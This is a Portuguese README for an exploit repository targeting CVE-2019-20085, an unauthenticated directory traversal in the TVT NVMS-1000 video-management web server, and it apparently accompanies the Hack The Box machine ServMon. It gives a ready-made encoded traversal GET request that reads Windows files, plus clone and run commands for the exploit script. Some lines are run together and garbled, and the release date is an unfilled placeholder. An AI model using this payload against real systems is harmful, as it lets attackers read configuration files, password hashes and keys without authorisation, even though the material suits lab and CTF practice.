
Um repositório usado para a máquina ServMon do Hackthebox
Autor: Z3R0 CVE: CVE-2019-20085 Alvo: TVT NVMS-1000 (todas as versões conhecidas anteriores ao patch) Tipo de Vulnerabilidade: Travessia de Diretório sem Autenticação Data: [Insira a Sua Data de Lançamento]
O software NVMS-1000 da TVT contém uma vulnerabilidade de travessia de diretório no componente do servidor web. Ao enviar uma solicitação GET especialmente elaborada usando sequências /.., um atacante não autenticado pode acessar arquivos arbitrários no sistema operacional subjacente, incluindo arquivos de configuração sensíveis, hashes de senha ou chaves do sistema.
Este exploit abusa da resolução vulnerável de caminhos de arquivo no servidor HTTP executado no NVMS-1000. Nenhuma autenticação é necessária. Um atacante remoto pode ler qualquer arquivo acessível ao usuário do serviço.
GET /..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: <target-ip>:80
C:\Windows\win.ini)requests (pip install requests)git clone https://github.com/Z3R0-0x30/CVE-2019-20085.git
cd CVE-2019-20085
python3 exploit.py http://domain.local/ ../../windows/win.ini win.ini"
Este exploit é disponibilizado apenas para fins educacionais e de pesquisa de segurança autorizada. O autor Z3R0 não é responsável por qualquer uso indevido ou acesso não autorizado. Sempre obtenha autorização adequada antes de testar sistemas.